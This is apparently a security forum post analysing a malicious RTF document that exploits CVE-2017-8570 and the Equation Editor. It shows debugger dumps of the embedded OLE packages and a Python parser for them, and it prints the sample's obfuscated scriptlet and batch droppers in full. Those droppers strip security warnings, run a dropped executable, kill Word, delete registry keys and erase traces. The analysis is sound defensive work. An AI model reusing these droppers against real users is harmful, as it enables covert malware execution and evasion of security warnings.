[Original] Analysis of a CVE-2017-8570 RTF sample
2018-8-26 16:45 4534


up777


1. Sample information

The sample was found on www.reverse.it; its basic information is as follows.

2. Behaviour on opening

Obfuscation

3. Removing the static obfuscation

As you can see, the sample is heavily obfuscated (Kaspersky kills it before it can even be dragged in), which gets in the way of analysis somewhat.
Load winword under windbg and set a breakpoint:
bp ole32!OleConvertOLESTREAMToIStorage
Then disconnect from the network and drag the rtf into winword.
ole32!OleConvertOLESTREAMToIStorage:
77a028fa 8bff            mov     edi,edi
The breakpoint hits.

0:000> kb
ChildEBP RetAddr  Args to Child             
00164cb8 69d3912e 043138d4 05490100 00000000 ole32!OleConvertOLESTREAMToIStorage [d:\w7rtm\com\ole32\ole232\ole1\ostm2stg.cpp @ 486]
WARNING: Stack unwind information not available. Following frames may be wrong.
00164f40 69fc827c 042ba000 043138d4 00000001 wwlib!DllCanUnloadNow+0xadec
00164f80 6997c4e8 042ba000 04310980 00164fec wwlib!DllCanUnloadNow+0x299f3a
0:000> dc 043138d4 l4
043138d4  6a2c78ec 00000001 01bf00e4 0000037d  .x,j........}...
0:000> db poi(01bf00e4) l37d
03c47e58  01 05 00 00 02 00 00 00-08 00 00 00 50 61 63 6b  ............Pack
03c47e68  61 67 65 00 00 00 00 00-00 00 00 00 55 03 00 00  age.........U...
03c47e78  02 00 6c 6f 6e 67 69 6e-74 65 72 63 6f 6e 73 74  ..longinterconst
03c47e88  61 2e 53 63 54 00 43 3a-5c 49 6e 74 65 6c 5c 6c  a.ScT.C:\Intel\l
03c47e98  6f 6e 67 69 6e 74 65 72-63 6f 6e 73 74 61 2e 53  onginterconsta.S
03c47ea8  63 54 00 00 00 03 00 1d-00 00 00 43 3a 5c 49 6e  cT.........C:\In
03c47eb8  74 65 6c 5c 6c 6f 6e 67-69 6e 74 65 72 63 6f 6e  tel\longintercon
03c47ec8  73 74 61 2e 53 63 54 00-57 02 00 00 3c 3f 58 4d  sta.ScT.W...<?XM

The first object is a Package.

0:000> .writemem c:\1.package poi(01bf00e4) l37d
Writing 37d bytes.

The second:

0:000> kb

ChildEBP RetAddr  Args to Child             
00164cb8 69d3912e 04313b9c 05490068 00000000 ole32!OleConvertOLESTREAMToIStorage [d:\w7rtm\com\ole32\ole232\ole1\ostm2stg.cpp @ 486]
WARNING: Stack unwind information not available. Following frames may be wrong.
00164f40 69fc827c 042ba000 04313b9c 00000001 wwlib!DllCanUnloadNow+0xadec
00164f80 6997c4e8 042ba000 04310980 00164fec wwlib!DllCanUnloadNow+0x299f3a

0:000> dd 04313b9c l4

04313b9c  6a2c78ec 00000001 01bf00dc 00000264

0:000> dc poi(01bf00dc) l264

03c87e78  00000501 00000002 00000008 6b636150  ............Pack
03c87e88  00656761 00000000 00000000 0000023c  age.........<...
03c87e98  6f670002 2e69646e 00636f64 495c3a43  ..gondi.doc.C:\I
03c87ea8  6c65746e 6e6f675c 642e6964 0000636f  ntel\gondi.doc..

0:000> .writemem c:\2.package poi(01bf00dc) l264

Writing 264 bytes

The third:

0:000> kb

ChildEBP RetAddr  Args to Child             
00164cb8 69d3912e 04313b9c 05495888 00000000 ole32!OleConvertOLESTREAMToIStorage [d:\w7rtm\com\ole32\ole232\ole1\ostm2stg.cpp @ 486]
WARNING: Stack unwind information not available. Following frames may be wrong.
00164f40 69fc827c 042ba000 04313b9c 00000001 wwlib!DllCanUnloadNow+0xadec
00164f80 6997c4e8 042ba000 04310980 00164fec wwlib!DllCanUnloadNow+0x299f3a

0:000> dd 04313b9c l4

04313b9c  6a2c78ec 00000001 01bf00dc 0005e2cb

0:000> dc poi(01bf00dc)

05290020  00000501 00000002 00000008 6b636150  ............Pack
05290030  00656761 00000000 00000000 0005e2a3  age.............
05290040  6f6d0002 2e69646e 00657865 495c3a43  ..mondi.exe.C:\I
05290050  6c65746e 6e6f6d5c 652e6964 00006578  ntel\mondi.exe..
05290060  13000300 43000000 6e495c3a 5c6c6574  .......C:\Intel\
05290070  646e6f6d 78652e69 e1ff0065 5a4d0005  mondi.exe.....MZ
05290080  00030090 00040000 ffff0000 00b80000  ................
05290090  00000000 00400000 00000000 00000000  ......@.........

0:000> .writemem c:\3.package poi(01bf00dc) l5e2cb

Writing 5e2cb bytes..............


The fourth:

0:000> g

Breakpoint 0 hit
eax=000004e8 ebx=042cf3c0 ecx=00008000 edx=00000000 esi=05490960 edi=00164f78
eip=77a028fa esp=00164cbc ebp=00164f40 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
ole32!OleConvertOLESTREAMToIStorage:
77a028fa 8bff            mov     edi,edi

0:000> kb

ChildEBP RetAddr  Args to Child             
00164cb8 69d3912e 04313b9c 054957f0 00000000 ole32!OleConvertOLESTREAMToIStorage [d:\w7rtm\com\ole32\ole232\ole1\ostm2stg.cpp @ 486]
WARNING: Stack unwind information not available. Following frames may be wrong.

0:000> dd 04313b9c

04313b9c  6a2c78ec 00000001 01bf00dc 0000017e
04313bac  00040010 00000002 00000000 00000000
04313bbc  00000000 00000000 00000000 00000000
04313bcc  00000000 00000000 00000000 00000000
04313bdc  00000000 00000000 00000000 00000000
04313bec  00000000 00000000 00000000 00000000
04313bfc  00000000 00000000 00000000 00000000
04313c0c  00000000 00000000 00000000 00000000

0:000> dc poi(01bf00dc)

03c87e78  00000501 00000002 00000008 6b636150  ............Pack
03c87e88  00656761 00000000 00000000 00000156  age.........V...
03c87e98  6e690002 632e6964 4300646d 6e495c3a  ..indi.cmd.C:\In
03c87ea8  5c6c6574 69646e69 646d632e 03000000  tel\indi.cmd....
03c87eb8  00001200 5c3a4300 65746e49 6e695c6c  .....C:\Intel\in
03c87ec8  632e6964 bb00646d 45000000 204f4843  di.cmd.....ECHO
03c87ed8  0d46464f 7465730a 6c6e7520 3d6b636f  OFF..set unlock=
03c87ee8  6d742522 0d222570 7465730a 636f6c20  "%tmp%"..set loc

0:000> .writemem c:\4.package poi(01bf00dc) l17e

Writing 17e bytes.


The fifth:

0:000> g

Breakpoint 0 hit
eax=000004e8 ebx=042dabe0 ecx=00008000 edx=00000000 esi=05490960 edi=00164f78
eip=77a028fa esp=00164cbc ebp=00164f40 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
ole32!OleConvertOLESTREAMToIStorage:
77a028fa 8bff            mov     edi,edi

0:000> kb

ChildEBP RetAddr  Args to Child             
00164cb8 69d3912e 04313b9c 054966f0 00000000 ole32!OleConvertOLESTREAMToIStorage [d:\w7rtm\com\ole32\ole232\ole1\ostm2stg.cpp @ 486]
WARNING: Stack unwind information not available. Following frames may be wrong.

0:000> dd 04313b9c

04313b9c  6a2c78ec 00000001 01bf00dc 00000314
04313bac  00040010 00000002 00000000 00000000
04313bbc  00000000 00000000 00000000 00000000
04313bcc  00000000 00000000 00000000 00000000
04313bdc  00000000 00000000 00000000 00000000
04313bec  00000000 00000000 00000000 00000000
04313bfc  00000000 00000000 00000000 00000000
04313c0c  00000000 00000000 00000000 00000000

0:000> dc poi(01bf00dc)

03c87e78  00000501 00000002 00000008 6b636150  ............Pack
03c87e88  00656761 00000000 00000000 000002ec  age.............
03c87e98  6f680002 2e69646e 00646d63 495c3a43  ..hondi.cmd.C:\I
03c87ea8  6c65746e 6e6f685c 632e6964 0000646d  ntel\hondi.cmd..
03c87eb8  13000300 43000000 6e495c3a 5c6c6574  .......C:\Intel\
03c87ec8  646e6f68 6d632e69 02480064 43450000  hondi.cmd.H...EC
03c87ed8  4f204f48 0a0d4646 454d4954 2054554f  HO OFF..TIMEOUT
03c87ee8  0a0d2031 20746573 70704122 6e69773d  1 ..set "App=win

0:000> .writemem c:\5.package poi(01bf00dc) l314

Writing 314 bytes.

The sixth is an OLELink:

0:000> g

Breakpoint 0 hit
eax=000004e8 ebx=042dab40 ecx=00008000 edx=00000000 esi=05490960 edi=00164f78
eip=77a028fa esp=00164cbc ebp=00164f40 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
ole32!OleConvertOLESTREAMToIStorage:
77a028fa 8bff            mov     edi,edi

0:000> kb

ChildEBP RetAddr  Args to Child             
00164cb8 69d3912e 04313b9c 05496388 00000000 ole32!OleConvertOLESTREAMToIStorage [d:\w7rtm\com\ole32\ole232\ole1\ostm2stg.cpp @ 486]
WARNING: Stack unwind information not available. Following frames may be wrong.

0:000> dd 04313b9c

04313b9c  6a2c78ec 00000001 01bf00dc 00000a49
04313bac  00040010 00000002 00000000 00000000
04313bbc  00000000 00000000 00000000 00000000
04313bcc  00000000 00000000 00000000 00000000
04313bdc  00000000 00000000 00000000 00000000
04313bec  00000000 00000000 00000000 00000000
04313bfc  00000000 00000000 00000000 00000000
04313c0c  00000000 00000000 00000000 00000000

0:000> dc poi(01bf00dc)

03c87e78  00000000 00000002 00000009 32454c4f  ............OLE2
03c87e88  6b6e694c 00000000 00000000 000a0000  Link............
03c87e98  11cfd000 1ab1a1e0 000000e1 00000000  ................
03c87ea8  00000000 00000000 03003e00 09fffe00  .........>......
03c87eb8  00000600 00000000 00000000 00000100  ................
03c87ec8  00000100 00000000 00100000 00000200  ................
03c87ed8  00000100 fffffe00 000000ff 00000000  ................
03c87ee8  ffffff00 ffffffff ffffffff ffffffff  ................

0:000> .writemem c:\6olelink poi(01bf00dc) la49

Writing a49 bytes..

The seventh is an Equation object:

0:000> kb

ChildEBP RetAddr  Args to Child             
00164cb8 69d3912e 04313b9c 05497f90 00000000 ole32!OleConvertOLESTREAMToIStorage [d:\w7rtm\com\ole32\ole232\ole1\ostm2stg.cpp @ 486]
WARNING: Stack unwind information not available. Following frames may be wrong.
0:000> dd 04313b9c
04313b9c  6a2c78ec 00000001 01bf00dc 0000124a
04313bac  00040010 00000002 00000000 00000000
04313bbc  00000000 00000000 00000000 00000000
04313bcc  00000000 00000000 00000000 00000000
04313bdc  00000000 00000000 00000000 00000000
04313bec  00000000 00000000 00000000 00000000
04313bfc  00000000 00000000 00000000 00000000
04313c0c  00000000 00000000 00000000 00000000
0:000> dc poi(01bf00dc)
03ccae98  b1a0b139 00000002 0000000b 41757145  9...........EquA
03ccaea8  6e6f6954 0000322e 00000000 00000000  Tion.2..........
03ccaeb8  d000000e a1e011cf 00e11ab1 00000000  ................
03ccaec8  00000000 00000000 3e000000 fe000300  ...........>....
03ccaed8  060009ff 00000000 00000000 01000000  ................
03ccaee8  01000000 00000000 00000000 02000010  ................
03ccaef8  01000000 fe000000 00ffffff 00000000  ................
03ccaf08  ff000000 ffffffff ffffffff ffffffff  ................
0:000> .writemem c:\7equation poi(01bf00dc) l124a
Writing 124a bytes...
After that, Word runs normally.
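Each .writemem above writes one raw OLE1 EmbeddedObject. As an added Python example (not from the original post), the parser below walks that header and, for Package objects, the native-data fields visible in the hex dumps (label, original path, temp path and the embedded file), so the dropped files can be recovered from the dumps offline. The field layout is taken from the dumps above; build_test_object only constructs a test blob and is not the real sample.

```python
import struct

def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]

def _cstr(buf, off):
    """NUL-terminated ANSI string at off; returns (text, offset past the NUL)."""
    end = buf.index(b"\0", off)
    return buf[off:end].decode("latin-1"), end + 1

def parse_ole1_object(blob):
    """Parse one OLE1 EmbeddedObject as dumped with .writemem above.
    Header: OLEVersion, FormatID, length-prefixed ClassName/TopicName/ItemName,
    NativeDataSize, NativeData.  For "Package", NativeData holds the dropped
    file: flags, label, original path, 4 reserved bytes, temp path, contents."""
    _ver, fmt, cls_len = struct.unpack_from("<III", blob, 0)
    if fmt != 2:     # FormatID 2 = embedded; OLEVersion is not checked (it is 0 in 6olelink above)
        raise ValueError("not an OLE1 embedded object")
    class_name = blob[12:12 + cls_len].rstrip(b"\0").decode("latin-1")
    off = 12 + cls_len
    for _ in ("TopicName", "ItemName"):           # both empty in this sample
        off += 4 + _u32(blob, off)
    native_size = _u32(blob, off)
    native = blob[off + 4:off + 4 + native_size]
    if len(native) != native_size:
        raise ValueError("truncated native data")
    info = {"class": class_name, "native_size": native_size}
    if class_name != "Package":                   # OLE2Link / Equation: header only
        return info
    p = 2                                         # skip the 0x0002 flags word
    info["label"], p = _cstr(native, p)
    info["src_path"], p = _cstr(native, p)
    p += 4                                        # flags2 + reserved word
    tmp_len = _u32(native, p)
    info["tmp_path"] = native[p + 4:p + 4 + tmp_len].rstrip(b"\0").decode("latin-1")
    p += 4 + tmp_len
    data_len = _u32(native, p)
    info["data"] = native[p + 4:p + 4 + data_len]
    return info

def build_test_object(label, path, payload):
    """Constructed test blob in the layout of 1.package above; not the real sample."""
    lbl, pth = label.encode() + b"\0", path.encode() + b"\0"
    native = (b"\x02\x00" + lbl + pth + b"\x00\x00\x03\x00"
              + struct.pack("<I", len(pth)) + pth
              + struct.pack("<I", len(payload)) + payload)
    header = (struct.pack("<III", 0x501, 2, 8) + b"Package\0"
              + struct.pack("<II", 0, 0) + struct.pack("<I", len(native)))
    return header + native + struct.pack("<II", 0x501, 0)  # empty presentation object
```

For 6olelink and 7equation only the header is returned, since their native data is an OLE2 compound document (the D0CF11E0 magic is visible right after the class name in those dumps) rather than a packaged file.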

In order they are: five Package objects, then the OLELink, then the Equation object. The order matters here; putting 6 or 7 first, for example, would not work.

Files in the tmp directory once Word is running:
Apart from mondi.exe, the files there do not match the packages extracted above; indi.cmd, for example, is absent, most likely because it was deleted.
The rough guess here is that this rtf actually contains two exploit modules: CVE-2017-8570 and the Equation object.

In short: five packages and two exploit objects.
The role of the five packages in this exploit is to drop files into the tmp directory.
The two exploit objects "run" the dropped packages; the rtf contains two objupdate controls, which is why they run automatically.


4. Analysing the exploit points


olelink: automatically runs trbatehtqevyay.ScT from the tmp directory, but tmp only contains longinterconsta.ScT and no trbatehtqevyay.ScT, so it has no effect (tested under Office 2007: it indeed did not launch; renaming the file to trbatehtqevyay.ScT makes it run). Even though this one does nothing, there is still the Equation object exploit below.

Reference: https://github.com/rxwx/CVE-2017-8570/blob/master/example.rtf


The content of longinterconsta.ScT is as follows; its job is to run indi.cmd from the tmp directory, the same role as the Equation object below.
<?XML version="1.0"?>
<scriptlet>

<registration
    description="indaclub"
    progid="indaclub"
    version="1.00"
    classid="{204774CF-D251-4F02-855B-2BE70585184B}"
    remotable="true"
    >
</registration>

<script><![CDATA[
        var dq='"';
        var KfXhbf="C";
        var a2 ="t";
        var w1="<";
        var xc=KfXhbf+"mD ";
        var xy= xc + "/" + KfXhbf + " " + xc + w1 + " " + dq + "%" + a2 + "eMP%\\i" + "ndi.cmd" + dq;
        var x2='ipt';
        var x1='WScr';
        var x4='ll';
        var x3='She';
        var r = new ActiveXObject(x1 + x2 + "." + x3 + x4); 
        r.Run(xy, 0, 1);]]>
</script>

</scriptlet>



Equation object

Runs indi.cmd


Batch file indi.cmd

ECHO OFF
set unlock="%tmp%"
set lock="\blOcK.txt"
IF EXIST %unlock%%lock% (exit) ELSE (copy NUL %unlock%%lock% & type NUL > %temp%\hondi.cmd:Zone.Identifier & start /b %tmp%\hondi.cmd)

If blOcK.txt exists in the tmp directory, exit immediately; otherwise create blOcK.txt (to prevent multiple launches), clear the security warning on hondi.cmd, and run hondi.cmd.


Batch file C:\Intel\hondi.cmd; its job is to run mondi.eXe so that opening the document looks normal (which it does not actually achieve).

ECHO OFF
TIMEOUT 1
set "App=winword.exe"
set "m1=HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\"
set "m2=.0\Word\File MRU"
set "m3=.0\Word\Resiliency"
type NUL > %tMp%\mondi.eXe:Zone.Identifier     clears the security warning
type NUL > %tmp%\gondi.doc:Zone.Identifier     clears the security warning
start %teMp%\mondi.eXe                         runs mondi.eXe
TASKKILL /F /IM %App%                          ends the word.exe process
for /l %%i in (11,1,16) do (                   Word-related registry operations, to suppress Word's warnings
reg delete %m1%%%i%m3% /f
for /f "tokens=1* delims=\*" %%a in ('REG QUERY "%m1%%%i%m2%" /v "Item 1"') do set "Nodeblan=%%~b"
)
copy %tmp%\gondi.dOc "%Maverick%"
"%Maverick%"                                   runs Word to open gondi.dOc (a benign document), creating a false impression (although in reality word.exe was killed above and never restarted)

del %tmp%\longinterconsta.sct   
del %tmp%\gondi.doc
del %tmp%\indi.cmd
del "%~0"



Last edited by 树梢之上 on 2019-4-13 13:05; reason: uploaded mondi.idb from home so it can be downloaded for analysis at any time.